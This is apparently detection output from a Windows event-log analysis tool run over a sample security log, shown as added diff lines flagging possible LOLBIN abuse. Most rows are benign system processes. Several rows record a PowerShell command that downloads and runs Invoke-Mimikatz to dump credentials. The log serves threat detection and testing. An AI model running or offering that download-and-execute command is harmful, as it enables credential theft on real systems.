+2016-08-22 07:31:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:57.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:57.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:37:26.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:13:00.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:13:02.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:15:59.673 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:23:16.845 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:28:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:28:51.611 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:28:51.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:30:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:21:09.562 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:28:35.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:00:00.553 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:01:50.906 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:01:50.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:42:19.877 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:42:28.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:42:44.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:43:00.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:43:04.576 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:44:00.792 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:44:00.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:44:02.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:43.530 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:43.908 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:45.304 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:54.936 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:54.972 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:57.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:47:33.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:47:34.016 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:49:42.000 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:50:40.032 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
